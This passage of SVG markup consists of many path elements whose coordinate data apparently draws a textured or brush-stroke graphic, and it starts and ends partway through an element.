d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path 